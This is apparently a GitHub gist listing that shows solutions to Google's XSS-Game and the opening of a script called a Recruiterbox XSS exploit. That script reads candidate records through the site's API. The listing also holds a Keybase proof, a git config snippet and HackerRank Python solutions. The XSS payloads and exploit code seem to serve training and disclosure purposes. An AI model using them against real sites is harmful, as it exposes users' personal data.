@djadmin
djadmin / XSS-Game Solutions
Created March 15, 2015 15:31
Google's XSS-Game Solutions
Below are the solutions to Google XSS challenges hosted on https://xss-game.appspot.com/
########################## Level 1: Hello, world of XSS ##########################
*** Query ***
https://xss-game.appspot.com/level1/frame?query=<script>alert(1)</script>
*** Vector ***
<script>alert(1)</script>
########################## Level 2: Persistence is key ##########################
@djadmin
djadmin / recruiterbox_exploit.js
Last active August 10, 2016 09:10
Recruiterbox.com HTML Injection Exploit
// Below code was used to demonstrate hiring made so easy - Recruiterbox XSS.
var candidates = [];
var request = new XMLHttpRequest();
request.open('GET', '/api/v1/candidates/', true);
request.onload = function() {
  var data = JSON.parse(request.responseText);
  console.log(data);
  candidates = data && data.objects;
  var profile = candidates.find(function (cand) {
    return cand.first_name === 'Dheeraj' && cand.last_name === 'Joshi';

Keybase proof

I hereby claim:

  • I am djadmin on github.
  • I am djadmin (https://keybase.io/djadmin) on keybase.
  • I have a public key ASBLZvlfekLas6TmwWb9gY2awd79PVfROH9v4DsZadSzvwo

To claim this, I am signing this object:

@djadmin
djadmin / config
Created January 16, 2016 15:14
Sync master with gh-pages branch
$ vim .git/config
push = +refs/heads/master:refs/heads/gh-pages
push = +refs/heads/master:refs/heads/master
@djadmin
djadmin / uk-and-us
Created August 23, 2013 07:03
HackerRank- The British and American style of Spelling https://www.hackerrank.com/challenges/uk-and-us
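# Read N lines of text, then for each of T query words (given in the "...ze" spelling)
# print how often it occurs in either its "...ze" or "...se" form.
TEXT=''
sum=0
N=int(raw_input())
for i in xrange(N):
    TEXT+=' '+str(raw_input())
T=int(raw_input())
for i in xrange(T):
    FIND=str(raw_input())
    print TEXT.count(FIND)+TEXT.count(FIND[:-2]+'se')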

# Count the input lines that mention 'hackerrank' (case-insensitive).
count=0
for i in xrange(input()):
    text=str(raw_input())
    if 'hackerrank' in text.lower():
        count+=1
print count

# Check that the second field of each line is a known language name.
languages=['C','CPP','JAVA','PYTHON','PERL','PHP','RUBY','CSHARP','HASKELL','CLOJURE','BASH','SCALA','ERLANG','CLISP','LUA','BRAINFUCK','JAVASCRIPT','GO','D','OCAML','R','PASCAL','SBCL','DART','GROOVY','OBJECTIVEC']
for i in xrange(input()):
    # Named 'fields' so the built-in input() is not shadowed.
    fields=str(raw_input()).split()
    language=fields[1]
    if language in languages:
        print 'VALID'
    else:
        print 'INVALID'

# Print lines that start with "hi " followed by any character other than d/D.
import re
for i in range(input()):
    text=str(raw_input())
    if re.search(r'^(hi [^d])',text,re.IGNORECASE):
        print text
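
# Validate a PAN: five uppercase letters, four digits, one uppercase letter.
import re
for i in xrange(input()):
    pan=str(raw_input())
    # Anchor both ends so a valid pattern embedded in a longer string is rejected.
    if re.search(r'^[A-Z]{5}[0-9]{4}[A-Z]$',pan):
        print 'YES'
    else:
        print 'NO'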

# Classify each line by whether it starts and/or ends with 'hackerrank'.
import re
N = int(raw_input())
for i in xrange(N):
    T=str(raw_input())
    if re.search(r'^hackerrank',T) and re.search(r'hackerrank$',T):
        print 0
    elif re.search(r'^hackerrank',T):
        print 1
    elif re.search(r'hackerrank$',T):